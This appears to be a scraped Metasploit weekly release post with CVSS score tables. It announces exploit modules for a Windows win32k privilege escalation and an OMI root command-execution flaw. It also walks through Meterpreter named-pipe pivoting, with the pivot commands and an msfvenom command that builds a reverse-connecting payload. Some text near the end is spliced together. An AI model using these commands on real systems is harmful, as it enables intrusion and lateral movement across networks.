9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
Metasploit has now added an exploit module for CVE-2021-40449, a Windows local privilege escalation exploit caused by a use-after-free during the NtGdiResetDC callback in vulnerable versions of win32k.sys. This module can be used to escalate privileges to those of NT AUTHORITY\SYSTEM
. The module should work against Windows 10 x64 build 14393 and 17763, but it should also work against older versions of Windows 10. Note that this exploit may not always work the first time, and may require an additional run to succeed.
As a continuation to the recently landed OMIGOD RCE module, Spencer McIntyre has contributed a new local privilege escalation module for CVE-2021-38648, which is an authentication bypass within Microsoft’s (OMI) management interface versions less than 1.6.8-1
. This vulnerability must be leveraged locally and can be exploited in the default configuration. Exploitation results in OS command execution as the root user.
This week dwelch-r7 fixed a regression issue in Meterpreter’s named pipe pivoting support. This relatively unknown feature was initially added by community contributor OJ and allows users to pivot additional Meterpreter sessions through a compromised host using named pipes over SMB.
As a quick demonstration, users can create a named pipe on a compromised Windows host through an existing Meterpreter session:
sessions -i -1
pivot add -t pipe -l $smb_host_ip -n mypipe -a x64 -p windows
Then verify the pivot was created successfully:
meterpreter > pivot list
Currently active pivot listeners
================================
Id URL Stage
-- --- -----
c134bb9f27dc4089b2f56b3ad25c4970 pipe://192.168.222.155/mypipe x64/windows
Now generate a new payload which will connect to the compromised host’s named pivot over SMB:
msfvenom -p windows/x64/meterpreter/reverse_named_pipe PIPEHOST=$smb_host_ip PIPENAME=mypipe -o pipe.exe -f exe -a x64
Execution of this new payload will attempt to connect to the compromised Windows host, resulting in a new session in msfconsole, which can be verified with the sessions
command:
v22.0.9.1
.1.6.8-1
of Microsoft’s Open Management Infrastructure (OMI) software. Issuing a command execution request against the local socket with the authentication handshake omitted can result in code execution as the root
user.download
command has been updated so that now supports tab completion for file paths and file names.#15818 from zeroSteiner - Fixes an edgecase in the Kubernetes exec module which led to sessions dying when performing partial websocket reads
#15820 from dwelch-r7 - Fixes a regression issue in Meterpreter’s named pipe pivoting support
#15838 from uhei - Fixes a regression error in auxiliary/scanner/sap/sap_router_portscanner
which caused this module to crash when validating host ranges
#15845 from smashery - This updates Meterpreter to check if it’s running as SYSTEM before attempting to escalate as part of getsystem
. This allows it to state that it’s already running as SYSTEM instead of displaying an error message that no escalation technique worked.
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P